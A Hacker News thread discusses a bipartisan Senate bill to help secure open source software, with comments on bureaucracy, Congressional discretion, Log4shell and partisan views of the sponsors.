Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Peters and Hawley Introduce Bipartisan Bill to Help Secure Open Source Software (senate.gov)
40 points by raybb on March 25, 2023 | hide | past | favorite | 23 comments



“This important legislation will, for the first time ever, codify open source software as public infrastructure,” said Trey Herr

Does this mean I can get paid hundreds of millions of dollars to ship upgrades to open source code several years late and with twice as much technical debt as before? Because if so, I'm on board

/s


No part of the bill requires actually securing software, or, like, running scans, or fixing vulns, or anything like that. It's a weird jobs program and mostly just adds bureaucracy.


I'd much rather they spent money hiring people to contribute to securing open source and doing outreach, rather than just some mandatory "software scanning" which generate noisy alerts no one does anything about.

Or neither. Just make a fund to hire talent to work all day hardening OSS projects. Rather than all the new mandatory meetings and oversight.


Forgive me if my bar is too low, but just to see bipartisan efforts at all toward this is a refreshing bright spot in American politics. Let's not make the perfect the enemy of the good.


Patriot act was bipartisan, generally if both parties agree on something it isn't good for the average American citizen


When the uniparty wins, the people always lose.


There is mandamus language that directs the DHS Director to "bolster the security of open source software", "support Federal efforts to strengthen the security of open source software", etc. but it's up to the director to determine the methods of doing so.


Flexibility and discretion, imagine that.


It's not practical for Congress to dictate the exact mechanisms for implementation.


Precisely.



Today I learned that we have an Agency for Cybersecurity and Infrastructure Security: https://www.cisa.gov/


[flagged]


^This is vandalism and contributes nothing


You flagged it for "Vandalism"? give me a break

Sorry I preferred a summary instead of reading entire bills on a Saturday morning.


I wonder what the cyclomatic complexity is of the set of federal laws.


From the perspective of politicians, bugs in the legal code are actually features. The incumbent power structure expends resources paying lawyers to find and exploit them, while the little people are mostly stuck following the law at face value. Most people don't even get to run the interpreter, but get forced into plea bargains and settlements instead! The imbalance helps perpetuate the status quo which lines the politicians' pockets.

Whereas bugs in computer software are problematic because they allow a new type of analyst to gain an outsized advantage, which upsets the status quo. Although the sharp contrast is slowly vanishing as full compromise bugs get rarer and the incumbent power structure employs more and more computer code analysts. For example, look at all of the security vulns in modern browsers and web protocols themselves that leak information to surveillance companies, but get downplayed as mere "privacy" problems that would be nice to fix some day perhaps.


How about just looking at tax law to really juice that average...


My favorite bit of 'tax law': Decades ago I accidentally failed to file a return and ended up needing to compute some interest and penalties when I figured it out a year later. When trying to determine how the computation was done exactly, I found a court case where the IRS petitioned the court to let them approximate the results of this specific computation because applying the rule exactly was too complicated for them!

[I did eventually figure it out.]


They specifically refer to Log4shell. That to me felt like a damp squib.

I remember seeing the apache logs on my home desktop on my cable modem back in 2001, the default.ida GETS would race through with multiple attempts per hour.

Conversely I saw barely any attempts on my public facing apache servers 20+ years later with log4shell. Was it just me?


There was at least one federal agency directly breached using it, so that’s probably part of it:

https://www.bleepingcomputer.com/news/security/us-govt-irani...


Hawley is dishonest, and I’m not familiar with Peters; Ron Wyden actually understands these issues, does he have an opinion on this bill?


Agreed. Wyden is my senator so I may be a bit biased, but I'd want to see his involvement in something like this because he's pretty much the only senator that gets this stuff. Reading that blurb it seems kind of ambiguous - it could potentially lead to some bad places if people who don't understand the issues are writing the bill.


Right. Would be more helpful to view this as fraternizing with confederates, not bipartisanship. Anything Hawley touches is tainted by his role as an insurrectionist.




Consider applying for YC's Fall 2025 batch! Applications are open till Aug 4

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: